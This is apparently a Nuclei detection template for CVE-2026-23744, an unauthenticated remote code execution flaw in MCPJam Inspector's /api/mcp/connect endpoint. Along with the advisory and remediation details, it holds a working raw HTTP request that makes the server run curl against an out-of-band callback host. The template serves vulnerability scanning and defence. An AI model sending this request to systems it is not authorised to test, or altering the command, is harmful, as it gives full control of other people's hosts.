id: CVE-2026-23744

info:
  name: MCPJam Inspector - Remote Code Execution
  author: Louay-075
  severity: critical
  description: |
    MCPJam Inspector is a local-first development platform for MCP servers. Version 1.4.2 and earlier are vulnerable to remote code execution (RCE): an attacker can send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
  impact: |
    An unauthenticated attacker can remotely execute arbitrary system commands via the exposed /api/mcp/connect endpoint. Successful exploitation leads to full compromise of the affected host.
  remediation: |
    Upgrade MCPJam Inspector to version 1.4.3 or later. Restrict the service to listen on 127.0.0.1.
  reference:
    - https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
    - https://github.com/advisories/GHSA-232v-j27c-5pp6
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23744
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-23744
    epss-score: 0.38374
    epss-percentile: 0.98384
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    vendor: mcpjam
    product: mcpjam
  tags: cve,cve2026,rce,mcpjam,oast,ai,vkev

http:
  - raw:
      - |
        POST /api/mcp/connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"serverConfig":{"timeout":10000,"command":"curl","args":["{{interactsh-url}}"],"env":{}},"serverId":"mymcp"}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Connection failed for server", "MCP error")'
          - 'contains(content_type, "application/json")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 500'
        condition: and
# digest: 4a0a00473045022007d1dd6a40b7b1c810dc7e28bcd373242148f4bc62fcd28dfea9fc96362e381d0221008118e60646ac0428fd554b094d28aa403c2d37290fde9657b94fb4fbcc552f67:922c64590222798bb761d5b6d8e72950